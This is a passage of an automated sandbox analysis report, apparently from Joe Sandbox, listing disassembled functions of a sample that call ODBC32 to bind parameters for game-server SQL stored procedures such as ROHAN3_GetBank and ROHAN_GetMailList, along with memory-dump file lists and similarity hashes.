                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetTCharacterUI] (?,?,?,?,?)}
                                                                                      • API String ID: 0-1553595866
                                                                                      • Opcode ID: ef93f336bc390832fb0a349ed5da98971a50c4d216afa70c9d44e4fcb048a32b
                                                                                      • Instruction ID: 2554a38098e0a816f158ffdcb87c2a38d4fa308403fc601afdfcf0b3ad4facc5
                                                                                      • Opcode Fuzzy Hash: ef93f336bc390832fb0a349ed5da98971a50c4d216afa70c9d44e4fcb048a32b
                                                                                      • Instruction Fuzzy Hash: 06512670645214BBEF648B54CC52FA973B5FB88728F20C285F6546A2C5CD76AD808FD8
                                                                                      APIs
                                                                                      • #19.ODBC32(?, { ? = CALL [ROHAN_InsIndunRestrictInfo] (?, ?, ?, ?, ?, ?)},000000FD), ref: 0043B08B
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043B0CD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043B102
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B13A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E6,000000FA,00000000), ref: 0043B172
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B1AA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B1E2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E6,000000FA,00000000), ref: 0043B21A
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsIndunRestrictInfo] (?, ?, ?, ?, ?, ?)}, xrefs: 0043B082
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsIndunRestrictInfo] (?, ?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-3535395023
                                                                                      • Opcode ID: 1fed44a667dc3210fc4aa65512f28c757e07aad78fa65b785b41141cee087306
                                                                                      • Instruction ID: 28abad3eae89541ce46ce08c9900f9202aab7f78dbe3711a391f000d52100585
                                                                                      • Opcode Fuzzy Hash: 1fed44a667dc3210fc4aa65512f28c757e07aad78fa65b785b41141cee087306
                                                                                      • Instruction Fuzzy Hash: E651FFB1A443947BEB249B54CC52FAB7335FB84B18F244688F6197E2C5D7F279808B18
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN3_GetBankAndRTM](?,?,?,?,?,?) } ,000000FD), ref: 004242E7
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00424317
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00424340
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042436C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00424398
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000E7,000000FB,00000000), ref: 004243C4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004243F0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000FA,000000FA,00000000), ref: 0042441C
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN3_GetBankAndRTM](?,?,?,?,?,?) } , xrefs: 004242DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN3_GetBankAndRTM](?,?,?,?,?,?) }
                                                                                      • API String ID: 0-1483371289
                                                                                      • Opcode ID: fb782c43b08a15af6e8faa84e1ee08a1d8b2a6a5fbd375dcb80154544afc3da7
                                                                                      • Instruction ID: 836c23248a50679a0a7f3086d2928199bda57934b5068628b35c5c334d69c600
                                                                                      • Opcode Fuzzy Hash: fb782c43b08a15af6e8faa84e1ee08a1d8b2a6a5fbd375dcb80154544afc3da7
                                                                                      • Instruction Fuzzy Hash: 4541F6B1A44205BBEB14DF94CC52FED7775EB88B28F248209F7107E2C5D5B5A840876C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN3_GetBank] (?,?,?,?,?,?)},000000FD), ref: 0042FA25
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042FA64
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042FA99
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042FAD1
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042FB09
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000E7,000000FB,00000000), ref: 0042FB41
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042FB79
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000FA,000000FA,00000000), ref: 0042FBB1
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN3_GetBank] (?,?,?,?,?,?)}, xrefs: 0042FA1C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN3_GetBank] (?,?,?,?,?,?)}
                                                                                      • API String ID: 0-3717493623
                                                                                      • Opcode ID: a4285b8c58fdb52c2a78bc2eb3f7353b787b9ac3bb92787a78ea2121b5b9698c
                                                                                      • Instruction ID: 5b6bf219960d08af51d7473009e3a9fd83b1ff4dfc6f0f254c2db5ef2435f19a
                                                                                      • Opcode Fuzzy Hash: a4285b8c58fdb52c2a78bc2eb3f7353b787b9ac3bb92787a78ea2121b5b9698c
                                                                                      • Instruction Fuzzy Hash: 2E510DB0740214BFEB24AB44CC52FAA7236EFD5B14F204288F7557E2C5D9B269608F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMailList](?,?,?,?,?,?)},000000FD), ref: 0043F052
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043F091
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043F0C6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F0FE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F136
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F16E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F1A6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043F1DE
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMailList](?,?,?,?,?,?)}, xrefs: 0043F049
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMailList](?,?,?,?,?,?)}
                                                                                      • API String ID: 0-1898760040
                                                                                      • Opcode ID: 839f3da3213504e3b928f53a0b60954f4f9a4edbc5afd3071acfc1ec78b9349d
                                                                                      • Instruction ID: 11a6f243a71edf8b922a410bb3db91fdd4b00d52e9374e2a584e39d862c26338
                                                                                      • Opcode Fuzzy Hash: 839f3da3213504e3b928f53a0b60954f4f9a4edbc5afd3071acfc1ec78b9349d
                                                                                      • Instruction Fuzzy Hash: 9451E0B56802187BFB289B54CD62FF97374EB84B18F104288F72C7E6C5D5B16D418B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsertQuestCurrRank] (?,?,?, ?,?,?)},000000FD), ref: 0043316A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004331A9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004331DE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433216
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043324E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433286
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004332BE
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004332F6
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsertQuestCurrRank] (?,?,?, ?,?,?)}, xrefs: 00433161
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsertQuestCurrRank] (?,?,?, ?,?,?)}
                                                                                      • API String ID: 0-999172464
                                                                                      • Opcode ID: 1ba9fb724b1f1d546dec052d657179adaf4be5ffec92c0034845ceea209a08f6
                                                                                      • Instruction ID: e5a715a75d391d9a1a9c3ac2aa8871354479cb7f610526aa956f47b7cc8f6c99
                                                                                      • Opcode Fuzzy Hash: 1ba9fb724b1f1d546dec052d657179adaf4be5ffec92c0034845ceea209a08f6
                                                                                      • Instruction Fuzzy Hash: 365107B0A4531477FB649B44DD52F9A7338EB84B28F104189F7147E2C6D7B16D80CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsertQuestGlobalRank] (?,?,?, ?,?,?)},000000FD), ref: 00433320
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043335F
